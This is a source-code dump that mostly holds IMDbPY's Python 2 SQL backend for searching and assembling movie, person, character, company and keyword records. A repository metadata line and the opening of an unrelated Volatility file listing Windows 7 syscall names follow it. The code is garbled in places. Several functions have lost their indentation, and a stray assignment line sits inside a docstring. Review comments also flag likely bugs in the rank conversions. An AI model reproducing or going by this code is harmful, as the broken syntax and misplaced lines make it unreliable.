% characterID)
def _normalize_companyID(self, companyID):
"""Normalize the given companyID."""
try:
return int(companyID)
except (ValueError, OverflowError):
raise IMDbError('companyID "%s" can\'t be converted to integer' \
% companyID)
def get_imdbMovieID(self, movieID):
"""Translate a movieID in an imdbID.
If not in the database, try an Exact Primary Title search on IMDb;
return None if it's unable to get the imdbID.
"""
try: movie = Title.get(movieID)
except NotFoundError: return None
imdbID = movie.imdbID
if imdbID is not None: return '%07d' % imdbID
m_dict = get_movie_data(movie.id, self._kind)
titline = build_title(m_dict, ptdf=0)
imdbID = self.title2imdbID(titline, m_dict['kind'])
# If the imdbID was retrieved from the web and was not in the
# database, update the database (ignoring errors, because it's
# possibile that the current user has not update privileges).
# There're times when I think I'm a genius; this one of
# those times... <g>
if imdbID is not None and not isinstance(imdbID, list):
try: movie.imdbID = int(imdbID)
except: pass
return imdbID
def get_imdbPersonID(self, personID):
"""Translate a personID in an imdbID.
If not in the database, try an Exact Primary Name search on IMDb;
return None if it's unable to get the imdbID.
"""
try: person = Name.get(personID)
except NotFoundError: return None
imdbID = person.imdbID
if imdbID is not None: return '%07d' % imdbID
n_dict = {'name': person.name, 'imdbIndex': person.imdbIndex}
namline = build_name(n_dict, canonical=False)
imdbID = self.name2imdbID(namline)
if imdbID is not None and not isinstance(imdbID, list):
try: person.imdbID = int(imdbID)
except: pass
return imdbID
def get_imdbCharacterID(self, characterID):
"""Translate a characterID in an imdbID.
If not in the database, try an Exact Primary Name search on IMDb;
return None if it's unable to get the imdbID.
"""
try: character = CharName.get(characterID)
except NotFoundError: return None
imdbID = character.imdbID
if imdbID is not None: return '%07d' % imdbID
n_dict = {'name': character.name, 'imdbIndex': character.imdbIndex}
namline = build_name(n_dict, canonical=False)
imdbID = self.character2imdbID(namline)
if imdbID is not None and not isinstance(imdbID, list):
try: character.imdbID = int(imdbID)
except: pass
return imdbID
def get_imdbCompanyID(self, companyID):
"""Translate a companyID in an imdbID.
If not in the database, try an Exact Primary Name search on IMDb;
return None if it's unable to get the imdbID.
"""
try: company = CompanyName.get(companyID)
except NotFoundError: return None
imdbID = company.imdbID
if imdbID is not None: return '%07d' % imdbID
n_dict = {'name': company.name, 'country': company.countryCode}
namline = build_company_name(n_dict)
imdbID = self.company2imdbID(namline)
if imdbID is not None and not isinstance(imdbID, list):
try: company.imdbID = int(imdbID)
except: pass
return imdbID
def do_adult_search(self, doAdult):
"""If set to 0 or False, movies in the Adult category are not
episodeOf = title_dict.get('episode of')
shown in the results of a search."""
self.doAdult = doAdult
    def _search_movie(self, title, results, _episodes=False):
        """Search the database for titles matching `title`; return at most
        `results` entries as (movieID, movie-data-dict) tuples.

        If `_episodes` is true, only episodes are searched.  When the
        parsed title itself refers to an episode of a series, the series
        is searched first and the query is restricted to its episodes.
        """
        title = title.strip()
        if not title: return []
        # Canonicalize the title and extract its components.
        title_dict = analyze_title(title, canonical=1)
        s_title = title_dict['title']
        if not s_title: return []
        episodeOf = title_dict.get('episode of')
        if episodeOf:
            _episodes = False
        # Drop a trailing article ("Matrix, The" -> "Matrix") before
        # computing the phonetic code.
        s_title_split = s_title.split(', ')
        if len(s_title_split) > 1 and \
                s_title_split[-1].lower() in _unicodeArticles:
            s_title_rebuilt = ', '.join(s_title_split[:-1])
            if s_title_rebuilt:
                s_title = s_title_rebuilt
        #if not episodeOf:
        #    if not _episodes:
        #        s_title_split = s_title.split(', ')
        #        if len(s_title_split) > 1 and \
        #                s_title_split[-1].lower() in _articles:
        #            s_title_rebuilt = ', '.join(s_title_split[:-1])
        #            if s_title_rebuilt:
        #                s_title = s_title_rebuilt
        #else:
        #    _episodes = False
        if isinstance(s_title, unicode):
            s_title = s_title.encode('ascii', 'ignore')
        soundexCode = soundex(s_title)
        # XXX: improve the search restricting the kindID if the
        # "kind" of the input differs from "movie"?
        condition = conditionAka = None
        if _episodes:
            condition = AND(Title.q.phoneticCode == soundexCode,
                            Title.q.kindID == self._kindRev['episode'])
            conditionAka = AND(AkaTitle.q.phoneticCode == soundexCode,
                            AkaTitle.q.kindID == self._kindRev['episode'])
        elif title_dict['kind'] == 'episode' and episodeOf is not None:
            # set canonical=0 ? Should not make much difference.
            series_title = build_title(episodeOf, canonical=1)
            # XXX: is it safe to get "results" results?
            # Too many? Too few?
            serRes = results
            if serRes < 3 or serRes > 10:
                serRes = 10
            # Recursively locate the parent series first.
            searchSeries = self._search_movie(series_title, serRes)
            seriesIDs = [result[0] for result in searchSeries]
            if seriesIDs:
                condition = AND(Title.q.phoneticCode == soundexCode,
                                IN(Title.q.episodeOfID, seriesIDs),
                                Title.q.kindID == self._kindRev['episode'])
                conditionAka = AND(AkaTitle.q.phoneticCode == soundexCode,
                                IN(AkaTitle.q.episodeOfID, seriesIDs),
                                AkaTitle.q.kindID == self._kindRev['episode'])
            else:
                # XXX: bad situation: we have found no matching series;
                # try searching everything (both episodes and
                # non-episodes) for the title.
                condition = AND(Title.q.phoneticCode == soundexCode,
                                IN(Title.q.episodeOfID, seriesIDs))
                conditionAka = AND(AkaTitle.q.phoneticCode == soundexCode,
                                IN(AkaTitle.q.episodeOfID, seriesIDs))
        if condition is None:
            # XXX: excludes episodes?
            condition = AND(Title.q.kindID != self._kindRev['episode'],
                            Title.q.phoneticCode == soundexCode)
            conditionAka = AND(AkaTitle.q.kindID != self._kindRev['episode'],
                            AkaTitle.q.phoneticCode == soundexCode)
        # Up to 3 variations of the title are searched, plus the
        # long imdb canonical title, if provided.
        if not _episodes:
            title1, title2, title3 = titleVariations(title)
        else:
            title1 = title
            title2 = ''
            title3 = ''
        try:
            # Query both the canonical titles and the AKA titles.
            qr = [(q.id, get_movie_data(q.id, self._kind))
                    for q in Title.select(condition)]
            q2 = [(q.movieID, get_movie_data(q.id, self._kind, fromAka=1))
                    for q in AkaTitle.select(conditionAka)]
            qr += q2
        except NotFoundError, e:
            raise IMDbDataAccessError( \
                    'unable to search the database: "%s"' % str(e))
        resultsST = results * 3
        res = scan_titles(qr, title1, title2, title3, resultsST,
                        searchingEpisode=episodeOf is not None,
                        onlyEpisodes=_episodes,
                        ro_thresold=0.0)
        res[:] = [x[1] for x in res]
        if res and not self.doAdult:
            # Filter out titles tagged with the 'Adult' genre.
            mids = [x[0] for x in res]
            genreID = self._infoRev['genres']
            adultlist = [al.movieID for al
                        in MovieInfo.select(
                            AND(MovieInfo.q.infoTypeID == genreID,
                                MovieInfo.q.info == 'Adult',
                                IN(MovieInfo.q.movieID, mids)))]
            res[:] = [x for x in res if x[0] not in adultlist]
        new_res = []
        # XXX: can there be duplicates?
        for r in res:
            if r not in q2:
                new_res.append(r)
                continue
            # Entry came from an AKA title: attach the AKA form to the
            # original title's data, unless the two are identical.
            mdict = r[1]
            aka_title = build_title(mdict, ptdf=1)
            orig_dict = get_movie_data(r[0], self._kind)
            orig_title = build_title(orig_dict, ptdf=1)
            if aka_title == orig_title:
                new_res.append(r)
                continue
            orig_dict['akas'] = [aka_title]
            new_res.append((r[0], orig_dict))
        if results > 0: new_res[:] = new_res[:results]
        return new_res
def _search_episode(self, title, results):
return self._search_movie(title, results, _episodes=True)
    def get_movie_main(self, movieID):
        """Return the main information set for the given movieID as a dict
        with 'data', 'titlesRefs', 'namesRefs' and 'info sets' keys.

        Raises IMDbDataAccessError when the movie cannot be retrieved.
        """
        # Every movie information is retrieved from here.
        infosets = self.get_movie_infoset()
        try:
            res = get_movie_data(movieID, self._kind)
        except NotFoundError, e:
            raise IMDbDataAccessError( \
                    'unable to get movieID "%s": "%s"' % (movieID, str(e)))
        if not res:
            raise IMDbDataAccessError('unable to get movieID "%s"' % movieID)
        # Collect cast information.
        castdata = [[cd.personID, cd.personRoleID, cd.note, cd.nrOrder,
                    self._role[cd.roleID]]
                    for cd in CastInfo.select(CastInfo.q.movieID == movieID)]
        for p in castdata:
            person = Name.get(p[0])
            p += [person.name, person.imdbIndex]
            # Actors and actresses are merged into a single 'cast' section.
            if p[4] in ('actor', 'actress'):
                p[4] = 'cast'
        # Regroup by role/duty (cast, writer, director, ...)
        castdata[:] = _groupListBy(castdata, 4)
        for group in castdata:
            duty = group[0][4]
            for pdata in group:
                curRole = pdata[1]
                curRoleID = None
                if curRole is not None:
                    # Resolve the character played, if any.
                    robj = CharName.get(curRole)
                    curRole = robj.name
                    curRoleID = robj.id
                p = Person(personID=pdata[0], name=pdata[5],
                            currentRole=curRole or u'',
                            roleID=curRoleID,
                            notes=pdata[2] or u'',
                            accessSystem='sql')
                if pdata[6]: p['imdbIndex'] = pdata[6]
                p.billingPos = pdata[3]
                res.setdefault(duty, []).append(p)
            if duty == 'cast':
                res[duty] = merge_roles(res[duty])
            res[duty].sort()
        # Info about the movie.
        minfo = [(self._info[m.infoTypeID], m.info, m.note)
                for m in MovieInfo.select(MovieInfo.q.movieID == movieID)]
        minfo += [(self._info[m.infoTypeID], m.info, m.note)
                for m in MovieInfoIdx.select(MovieInfoIdx.q.movieID == movieID)]
        minfo += [('keywords', Keyword.get(m.keywordID).keyword, None)
                for m in MovieKeyword.select(MovieKeyword.q.movieID == movieID)]
        minfo = _groupListBy(minfo, 0)
        for group in minfo:
            sect = group[0][0]
            for mdata in group:
                data = mdata[1]
                # Notes are appended with the '::' separator convention.
                if mdata[2]: data += '::%s' % mdata[2]
                res.setdefault(sect, []).append(data)
        # Companies info about a movie.
        cinfo = [(self._compType[m.companyTypeID], m.companyID, m.note) for m
                in MovieCompanies.select(MovieCompanies.q.movieID == movieID)]
        cinfo = _groupListBy(cinfo, 0)
        for group in cinfo:
            sect = group[0][0]
            for mdata in group:
                cDb = CompanyName.get(mdata[1])
                cDbTxt = cDb.name
                if cDb.countryCode:
                    cDbTxt += ' %s' % cDb.countryCode
                company = Company(name=cDbTxt,
                                companyID=mdata[1],
                                notes=mdata[2] or u'',
                                accessSystem=self.accessSystem)
                res.setdefault(sect, []).append(company)
        # AKA titles.
        akat = [(get_movie_data(at.id, self._kind, fromAka=1), at.note)
                for at in AkaTitle.select(AkaTitle.q.movieID == movieID)]
        if akat:
            res['akas'] = []
            for td, note in akat:
                nt = build_title(td, ptdf=1)
                if note:
                    net = self._changeAKAencoding(note, nt)
                    if net is not None: nt = net
                    nt += '::%s' % note
                if nt not in res['akas']: res['akas'].append(nt)
        # Complete cast/crew.
        compcast = [(self._compcast[cc.subjectID], self._compcast[cc.statusID])
                for cc in CompleteCast.select(CompleteCast.q.movieID == movieID)]
        if compcast:
            for entry in compcast:
                val = unicode(entry[1])
                res[u'complete %s' % entry[0]] = val
        # Movie connections.
        mlinks = [[ml.linkedMovieID, self._link[ml.linkTypeID]]
                    for ml in MovieLink.select(MovieLink.q.movieID == movieID)]
        if mlinks:
            for ml in mlinks:
                lmovieData = get_movie_data(ml[0], self._kind)
                if lmovieData:
                    m = Movie(movieID=ml[0], data=lmovieData, accessSystem='sql')
                    ml[0] = m
            res['connections'] = {}
            mlinks[:] = _groupListBy(mlinks, 1)
            for group in mlinks:
                lt = group[0][1]
                res['connections'][lt] = [i[0] for i in group]
        # Episodes.
        episodes = {}
        eps_list = list(Title.select(Title.q.episodeOfID == movieID))
        eps_list.sort()
        if eps_list:
            ps_data = {'title': res['title'], 'kind': res['kind'],
                        'year': res.get('year'),
                        'imdbIndex': res.get('imdbIndex')}
            parentSeries = Movie(movieID=movieID, data=ps_data,
                                accessSystem='sql')
            for episode in eps_list:
                episodeID = episode.id
                episode_data = get_movie_data(episodeID, self._kind)
                m = Movie(movieID=episodeID, data=episode_data,
                            accessSystem='sql')
                m['episode of'] = parentSeries
                season = episode_data.get('season', 'UNKNOWN')
                if season not in episodes: episodes[season] = {}
                ep_number = episode_data.get('episode')
                if ep_number is None:
                    # Episodes with no number are appended after the
                    # highest known number in the season.
                    ep_number = max((episodes[season].keys() or [0])) + 1
                episodes[season][ep_number] = m
            res['episodes'] = episodes
            res['number of episodes'] = sum([len(x) for x in episodes.values()])
            res['number of seasons'] = len(episodes.keys())
        # Regroup laserdisc information.
        res = _reGroupDict(res, self._moviesubs)
        # Do some transformation to preserve consistency with other
        # data access systems.
        if 'quotes' in res:
            for idx, quote in enumerate(res['quotes']):
                res['quotes'][idx] = quote.split('::')
        if 'runtimes' in res and len(res['runtimes']) > 0:
            rt = res['runtimes'][0]
            episodes = re_episodes.findall(rt)
            if episodes:
                res['runtimes'][0] = re_episodes.sub('', rt)
                if res['runtimes'][0][-2:] == '::':
                    res['runtimes'][0] = res['runtimes'][0][:-2]
        if 'votes' in res:
            res['votes'] = int(res['votes'][0])
        if 'rating' in res:
            res['rating'] = float(res['rating'][0])
        if 'votes distribution' in res:
            res['votes distribution'] = res['votes distribution'][0]
        if 'mpaa' in res:
            res['mpaa'] = res['mpaa'][0]
        if 'top 250 rank' in res:
            # NOTE(review): unlike 'votes' above, this int() is applied to
            # the whole value (likely a list, given how sections are
            # accumulated) and so may only "work" via the bare except --
            # confirm whether res['top 250 rank'][0] was intended.
            try: res['top 250 rank'] = int(res['top 250 rank'])
            except: pass
        if 'bottom 10 rank' in res:
            # NOTE(review): same concern as 'top 250 rank' above.
            try: res['bottom 100 rank'] = int(res['bottom 10 rank'])
            except: pass
            del res['bottom 10 rank']
        for old, new in [('guest', 'guests'), ('trademarks', 'trade-mark'),
                        ('articles', 'article'), ('pictorials', 'pictorial'),
                        ('magazine-covers', 'magazine-cover-photo')]:
            if old in res:
                res[new] = res[old]
                del res[old]
        trefs,nrefs = {}, {}
        trefs,nrefs = self._extractRefs(sub_dict(res,Movie.keys_tomodify_list))
        return {'data': res, 'titlesRefs': trefs, 'namesRefs': nrefs,
                'info sets': infosets}
    # Just to know what kind of information are available.
    get_movie_alternate_versions = get_movie_main
    get_movie_business = get_movie_main
    get_movie_connections = get_movie_main
    get_movie_crazy_credits = get_movie_main
    get_movie_goofs = get_movie_main
    get_movie_keywords = get_movie_main
    get_movie_literature = get_movie_main
    get_movie_locations = get_movie_main
    get_movie_plot = get_movie_main
    get_movie_quotes = get_movie_main
    get_movie_release_dates = get_movie_main
    get_movie_soundtrack = get_movie_main
    get_movie_taglines = get_movie_main
    get_movie_technical = get_movie_main
    get_movie_trivia = get_movie_main
    get_movie_vote_details = get_movie_main
    get_movie_episodes = get_movie_main
    def _search_person(self, name, results):
        """Search people by name; return at most `results` entries as
        (personID, {'name': ..., 'imdbIndex': ...}) tuples, matching both
        canonical names and AKA names by phonetic code."""
        name = name.strip()
        if not name: return []
        s_name = analyze_name(name)['name']
        if not s_name: return []
        if isinstance(s_name, unicode):
            s_name = s_name.encode('ascii', 'ignore')
        soundexCode = soundex(s_name)
        name1, name2, name3 = nameVariations(name)
        # If the soundex is None, compare only with the first
        # phoneticCode column.
        if soundexCode is not None:
            condition = IN(soundexCode, [Name.q.namePcodeCf,
                                         Name.q.namePcodeNf,
                                         Name.q.surnamePcode])
            conditionAka = IN(soundexCode, [AkaName.q.namePcodeCf,
                                            AkaName.q.namePcodeNf,
                                            AkaName.q.surnamePcode])
        else:
            condition = ISNULL(Name.q.namePcodeCf)
            conditionAka = ISNULL(AkaName.q.namePcodeCf)
        try:
            qr = [(q.id, {'name': q.name, 'imdbIndex': q.imdbIndex})
                    for q in Name.select(condition)]
            q2 = [(q.personID, {'name': q.name, 'imdbIndex': q.imdbIndex})
                    for q in AkaName.select(conditionAka)]
            qr += q2
        except NotFoundError, e:
            raise IMDbDataAccessError( \
                    'unable to search the database: "%s"' % str(e))
        res = scan_names(qr, name1, name2, name3, results)
        res[:] = [x[1] for x in res]
        # Purge empty imdbIndex.
        returnl = []
        for x in res:
            tmpd = x[1]
            if tmpd['imdbIndex'] is None:
                del tmpd['imdbIndex']
            returnl.append((x[0], tmpd))
        new_res = []
        # XXX: can there be duplicates?
        for r in returnl:
            if r not in q2:
                new_res.append(r)
                continue
            # Entry came from an AKA name: attach the AKA form to the
            # person's canonical data, unless the two are identical.
            pdict = r[1]
            aka_name = build_name(pdict, canonical=1)
            p = Name.get(r[0])
            orig_dict = {'name': p.name, 'imdbIndex': p.imdbIndex}
            if orig_dict['imdbIndex'] is None:
                del orig_dict['imdbIndex']
            orig_name = build_name(orig_dict, canonical=1)
            if aka_name == orig_name:
                new_res.append(r)
                continue
            orig_dict['akas'] = [aka_name]
            new_res.append((r[0], orig_dict))
        if results > 0: new_res[:] = new_res[:results]
        return new_res
    def get_person_main(self, personID):
        """Return the main information set for the given personID as a dict
        with 'data', 'titlesRefs', 'namesRefs' and 'info sets' keys.

        Raises IMDbDataAccessError when the person cannot be retrieved.
        """
        # Every person information is retrieved from here.
        infosets = self.get_person_infoset()
        try:
            p = Name.get(personID)
        except NotFoundError, e:
            raise IMDbDataAccessError( \
                    'unable to get personID "%s": "%s"' % (personID, str(e)))
        res = {'name': p.name, 'imdbIndex': p.imdbIndex}
        if res['imdbIndex'] is None: del res['imdbIndex']
        if not res:
            raise IMDbDataAccessError('unable to get personID "%s"' % personID)
        # Collect cast information.
        castdata = [(cd.movieID, cd.personRoleID, cd.note,
                    self._role[cd.roleID],
                    get_movie_data(cd.movieID, self._kind))
                    for cd in CastInfo.select(CastInfo.q.personID == personID)]
        # Regroup by role/duty (cast, writer, director, ...)
        castdata[:] = _groupListBy(castdata, 3)
        episodes = {}
        seenDuties = []
        for group in castdata:
            for mdata in group:
                duty = orig_duty = group[0][3]
                if duty not in seenDuties: seenDuties.append(orig_duty)
                note = mdata[2] or u''
                if 'episode of' in mdata[4]:
                    # TV episodes are collected separately, keyed by series;
                    # the original duty is kept in the note for non-acting
                    # roles.
                    duty = 'episodes'
                    if orig_duty not in ('actor', 'actress'):
                        if note: note = ' %s' % note
                        note = '[%s]%s' % (orig_duty, note)
                curRole = mdata[1]
                curRoleID = None
                if curRole is not None:
                    # Resolve the character played, if any.
                    robj = CharName.get(curRole)
                    curRole = robj.name
                    curRoleID = robj.id
                m = Movie(movieID=mdata[0], data=mdata[4],
                            currentRole=curRole or u'',
                            roleID=curRoleID,
                            notes=note, accessSystem='sql')
                if duty != 'episodes':
                    res.setdefault(duty, []).append(m)
                else:
                    episodes.setdefault(m['episode of'], []).append(m)
        if episodes:
            # Newest episodes first within each series.
            for k in episodes:
                episodes[k].sort()
                episodes[k].reverse()
            res['episodes'] = episodes
        for duty in seenDuties:
            if duty in res:
                if duty in ('actor', 'actress', 'himself', 'herself',
                            'themselves'):
                    res[duty] = merge_roles(res[duty])
                res[duty].sort()
        # Info about the person.
        pinfo = [(self._info[pi.infoTypeID], pi.info, pi.note)
                for pi in PersonInfo.select(PersonInfo.q.personID == personID)]
        # Regroup by duty.
        pinfo = _groupListBy(pinfo, 0)
        for group in pinfo:
            sect = group[0][0]
            for pdata in group:
                data = pdata[1]
                # Notes are appended with the '::' separator convention.
                if pdata[2]: data += '::%s' % pdata[2]
                res.setdefault(sect, []).append(data)
        # AKA names.
        akan = [(an.name, an.imdbIndex)
                for an in AkaName.select(AkaName.q.personID == personID)]
        if akan:
            res['akas'] = []
            for n in akan:
                nd = {'name': n[0]}
                if n[1]: nd['imdbIndex'] = n[1]
                nt = build_name(nd, canonical=1)
                res['akas'].append(nt)
        # Do some transformation to preserve consistency with other
        # data access systems.
        for key in ('birth date', 'birth notes', 'death date', 'death notes',
                    'birth name', 'height'):
            if key in res:
                res[key] = res[key][0]
        if 'guest' in res:
            res['notable tv guest appearances'] = res['guest']
            del res['guest']
        # Nick names and the birth name must not be duplicated in 'akas'.
        miscnames = res.get('nick names', [])
        if 'birth name' in res: miscnames.append(res['birth name'])
        if 'akas' in res:
            for mname in miscnames:
                if mname in res['akas']: res['akas'].remove(mname)
            if not res['akas']: del res['akas']
        trefs,nrefs = self._extractRefs(sub_dict(res,Person.keys_tomodify_list))
        return {'data': res, 'titlesRefs': trefs, 'namesRefs': nrefs,
                'info sets': infosets}
    # Just to know what kind of information are available.
    get_person_filmography = get_person_main
    get_person_biography = get_person_main
    get_person_other_works = get_person_main
    get_person_episodes = get_person_main
def _search_character(self, name, results):
name = name.strip()
if not name: return []
s_name = analyze_name(name)['name']
if not s_name: return []
if isinstance(s_name, unicode):
s_name = s_name.encode('ascii', 'ignore')
s_name = normalizeName(s_name)
soundexCode = soundex(s_name)
surname = s_name.split(' ')[-1]
surnameSoundex = soundex(surname)
name2 = ''
soundexName2 = None
nsplit = s_name.split()
if len(nsplit) > 1:
name2 = '%s %s' % (nsplit[-1], ' '.join(nsplit[:-1]))
if s_name == name2:
name2 = ''
else:
soundexName2 = soundex(name2)
# If the soundex is None, compare only with the first
# phoneticCode column.
if soundexCode is not None:
if soundexName2 is not None:
condition = OR(surnameSoundex == CharName.q.surnamePcode,
IN(CharName.q.namePcodeNf, [soundexCode,
soundexName2]),
IN(CharName.q.surnamePcode, [soundexCode,
soundexName2]))
else:
condition = OR(surnameSoundex == CharName.q.surnamePcode,
IN(soundexCode, [CharName.q.namePcodeNf,
CharName.q.surnamePcode]))
else:
condition = ISNULL(Name.q.namePcodeNf)
try:
qr = [(q.id, {'name': q.name, 'imdbIndex': q.imdbIndex})
for q in CharName.select(condition)]
except NotFoundError, e:
raise IMDbDataAccessError( \
'unable to search the database: "%s"' % str(e))
res = scan_names(qr, s_name, name2, '', results,
_scan_character=True)
res[:] = [x[1] for x in res]
# Purge empty imdbIndex.
returnl = []
for x in res:
tmpd = x[1]
if tmpd['imdbIndex'] is None:
del tmpd['imdbIndex']
returnl.append((x[0], tmpd))
return returnl
    def get_character_main(self, characterID, results=1000):
        """Return the main information set for the given characterID as a
        dict with 'data' and 'info sets' keys; filmography is capped at
        `results` entries when results > 0."""
        # Every character information is retrieved from here.
        infosets = self.get_character_infoset()
        try:
            c = CharName.get(characterID)
        except NotFoundError, e:
            raise IMDbDataAccessError( \
                    'unable to get characterID "%s": "%s"' % (characterID, e))
        res = {'name': c.name, 'imdbIndex': c.imdbIndex}
        if res['imdbIndex'] is None: del res['imdbIndex']
        if not res:
            raise IMDbDataAccessError('unable to get characterID "%s"' % \
                                    characterID)
        # Collect filmography information.
        items = CastInfo.select(CastInfo.q.personRoleID == characterID)
        if results > 0:
            items = items[:results]
        # Only acting credits count as a character's filmography.
        filmodata = [(cd.movieID, cd.personID, cd.note,
                    get_movie_data(cd.movieID, self._kind)) for cd in items
                    if self._role[cd.roleID] in ('actor', 'actress')]
        fdata = []
        for f in filmodata:
            curRole = None
            curRoleID = f[1]
            note = f[2] or u''
            if curRoleID is not None:
                # Here the "role" is the person who played the character.
                robj = Name.get(curRoleID)
                curRole = robj.name
            m = Movie(movieID=f[0], data=f[3],
                        currentRole=curRole or u'',
                        roleID=curRoleID, roleIsPerson=True,
                        notes=note, accessSystem='sql')
            fdata.append(m)
        fdata = merge_roles(fdata)
        fdata.sort()
        if fdata:
            res['filmography'] = fdata
        return {'data': res, 'info sets': infosets}
    get_character_filmography = get_character_main
    get_character_biography = get_character_main
    def _search_company(self, name, results):
        """Search companies by name; return at most `results` entries as
        (companyID, {'name': ..., 'country': ...}) tuples."""
        name = name.strip()
        if not name: return []
        if isinstance(name, unicode):
            name = name.encode('ascii', 'ignore')
        soundexCode = soundex(name)
        # If the soundex is None, compare only with the first
        # phoneticCode column.
        if soundexCode is None:
            condition = ISNULL(CompanyName.q.namePcodeNf)
        else:
            if name.endswith(']'):
                # NOTE(review): a trailing ']' presumably means the name
                # carries a "[country]" suffix, matched against the
                # with-country phonetic code -- confirm against the schema.
                condition = CompanyName.q.namePcodeSf == soundexCode
            else:
                condition = CompanyName.q.namePcodeNf == soundexCode
        try:
            qr = [(q.id, {'name': q.name, 'country': q.countryCode})
                    for q in CompanyName.select(condition)]
        except NotFoundError, e:
            raise IMDbDataAccessError( \
                    'unable to search the database: "%s"' % str(e))
        qr[:] = [(x[0], build_company_name(x[1])) for x in qr]
        res = scan_company_names(qr, name, results)
        res[:] = [x[1] for x in res]
        # Purge empty country keys.
        returnl = []
        for x in res:
            tmpd = x[1]
            country = tmpd.get('country')
            if country is None and 'country' in tmpd:
                del tmpd['country']
            returnl.append((x[0], tmpd))
        return returnl
    def get_company_main(self, companyID, results=0):
        """Return the main information set for the given companyID as a
        dict with 'data' and 'info sets' keys; filmography is capped at
        `results` entries when results > 0."""
        # Every company information is retrieved from here.
        infosets = self.get_company_infoset()
        try:
            c = CompanyName.get(companyID)
        except NotFoundError, e:
            raise IMDbDataAccessError( \
                    'unable to get companyID "%s": "%s"' % (companyID, e))
        res = {'name': c.name, 'country': c.countryCode}
        if res['country'] is None: del res['country']
        if not res:
            raise IMDbDataAccessError('unable to get companyID "%s"' % \
                                    companyID)
        # Collect filmography information.
        items = MovieCompanies.select(MovieCompanies.q.companyID == companyID)
        if results > 0:
            items = items[:results]
        filmodata = [(cd.movieID, cd.companyID,
                    self._compType[cd.companyTypeID], cd.note,
                    get_movie_data(cd.movieID, self._kind)) for cd in items]
        # Group movies by company type (production, distribution, ...).
        filmodata = _groupListBy(filmodata, 2)
        for group in filmodata:
            ctype = group[0][2]
            for movieID, companyID, ctype, note, movieData in group:
                movie = Movie(data=movieData, movieID=movieID,
                            notes=note or u'', accessSystem=self.accessSystem)
                res.setdefault(ctype, []).append(movie)
            # NOTE(review): this sort runs once per movie in the group
            # (it is inside the inner loop) -- presumably it was meant to
            # run once per group; behavior is unchanged either way.
            res.get(ctype, []).sort()
        return {'data': res, 'info sets': infosets}
def _search_keyword(self, keyword, results):
constr = OR(Keyword.q.phoneticCode ==
soundex(keyword.encode('ascii', 'ignore')),
CONTAINSSTRING(Keyword.q.keyword, self.toUTF8(keyword)))
return filterSimilarKeywords(keyword,
_iterKeywords(Keyword.select(constr)))[:results]
def _get_keyword(self, keyword, results):
keyID = Keyword.select(Keyword.q.keyword == keyword)
if keyID.count() == 0:
return []
keyID = keyID[0].id
movies = MovieKeyword.select(MovieKeyword.q.keywordID ==
keyID)[:results]
return [(m.movieID, get_movie_data(m.movieID, self._kind))
for m in movies]
    def _get_top_bottom_movies(self, kind):
        """Return the top-250 or bottom-10 chart (for kind 'top' or
        'bottom' respectively) as a sorted list of (movieID, info-dict)
        tuples; any other kind yields an empty list."""
        if kind == 'top':
            kind = 'top 250 rank'
        elif kind == 'bottom':
            # Not a refuse: the plain text data files contains only
            # the bottom 10 movies.
            kind = 'bottom 10 rank'
        else:
            return []
        infoID = InfoType.select(InfoType.q.info == kind)
        if infoID.count() == 0:
            return []
        infoID = infoID[0].id
        movies = MovieInfoIdx.select(MovieInfoIdx.q.infoTypeID == infoID)
        ml = []
        for m in movies:
            minfo = get_movie_data(m.movieID, self._kind)
            # Attach rank/votes/rating/distribution, converted to their
            # natural numeric types where present.
            for k in kind, 'votes', 'rating', 'votes distribution':
                valueDict = getSingleInfo(MovieInfoIdx, m.movieID,
                                        k, notAList=True)
                if k in (kind, 'votes') and k in valueDict:
                    valueDict[k] = int(valueDict[k])
                elif k == 'rating' and k in valueDict:
                    valueDict[k] = float(valueDict[k])
                minfo.update(valueDict)
            ml.append((m.movieID, minfo))
        # Python 2 cmp-style sort: ascending rank for the top chart,
        # the bottom chart uses its own comparator.
        sorter = (_cmpBottom, _cmpTop)[kind == 'top 250 rank']
        ml.sort(sorter)
        return ml
def __del__(self):
"""Ensure that the connection is closed."""
if not hasattr(self, '_connection'): return
self._sql_logger.debug('closing connection to the database')
self._connection.close()
| gpl-3.0 |
cakeboss893/volatility | volatility/plugins/overlays/windows/win7_sp01_x86_syscalls.py | 58 | 45962 | # Volatility
# Copyright (c) 2008-2013 Volatility Foundation
# Copyright (c) 2011 Michael Hale Ligh <michael.hale@gmail.com>
#
# This file is part of Volatility.
#
# Volatility is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# Volatility is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Volatility. If not, see <http://www.gnu.org/licenses/>.
#
syscalls = [
[
'NtAcceptConnectPort', # 0x0
'NtAccessCheck', # 0x1
'NtAccessCheckAndAuditAlarm', # 0x2
'NtAccessCheckByType', # 0x3
'NtAccessCheckByTypeAndAuditAlarm', # 0x4
'NtAccessCheckByTypeResultList', # 0x5
'NtAccessCheckByTypeResultListAndAuditAlarm', # 0x6
'NtAccessCheckByTypeResultListAndAuditAlarmByHandle', # 0x7
'NtAddAtom', # 0x8
'NtAddBootEntry', # 0x9
'NtAddDriverEntry', # 0xa
'NtAdjustGroupsToken', # 0xb
'NtAdjustPrivilegesToken', # 0xc
'NtAlertResumeThread', # 0xd
'NtAlertThread', # 0xe
'NtAllocateLocallyUniqueId', # 0xf
'NtAllocateReserveObject', # 0x10
'NtAllocateUserPhysicalPages', # 0x11
'NtAllocateUuids', # 0x12
'NtAllocateVirtualMemory', # 0x13
'NtAlpcAcceptConnectPort', # 0x14
'NtAlpcCancelMessage', # 0x15
'NtAlpcConnectPort', # 0x16
'NtAlpcCreatePort', # 0x17
'NtAlpcCreatePortSection', # 0x18
'NtAlpcCreateResourceReserve', # 0x19
'NtAlpcCreateSectionView', # 0x1a
'NtAlpcCreateSecurityContext', # 0x1b
'NtAlpcDeletePortSection', # 0x1c
'NtAlpcDeleteResourceReserve', # 0x1d
'NtAlpcDeleteSectionView', # 0x1e
'NtAlpcDeleteSecurityContext', # 0x1f
'NtAlpcDisconnectPort', # 0x20
'NtAlpcImpersonateClientOfPort', # 0x21
'NtAlpcOpenSenderProcess', # 0x22
'NtAlpcOpenSenderThread', # 0x23
'NtAlpcQueryInformation', # 0x24
'NtAlpcQueryInformationMessage', # 0x25
'NtAlpcRevokeSecurityContext', # 0x26
'NtAlpcSendWaitReceivePort', # 0x27
'NtAlpcSetInformation', # 0x28
